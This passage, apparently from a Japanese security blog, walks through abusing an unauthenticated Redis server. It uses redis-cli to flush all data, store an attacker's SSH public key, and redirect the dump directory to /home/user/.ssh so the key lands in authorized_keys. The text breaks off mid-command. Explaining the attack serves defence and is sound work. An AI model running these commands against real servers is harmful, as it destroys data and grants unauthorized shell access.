Redisで任意のファイルをアップロードする攻撃 | csirt.mrtc0.logまず, 攻撃者は既に格納されているキーとバリューをクリアします. その後, 自身の公開鍵を適当なキー(ここではpwnというキー)で保存します. そしてデータを書き出すディレクトリ(/home/user/.ssh/)を設定し, ファイル名をauthorized_keysとします. 最後にデータを書き出します. [1] $ redis-cli -h 172.17.0.2 flushall $ cat id_rsa.pub| redis-cli -h 172.17.0.2 -x set pwn $ redis-cli -h 172.17.0.2 172.17.0.2:6379> config set dir "/home/user/.ssh" OK 172.17.0.2:6379> config get dir 1) "dir" 2) "/home/user/.ssh" 172.17.0.2:6
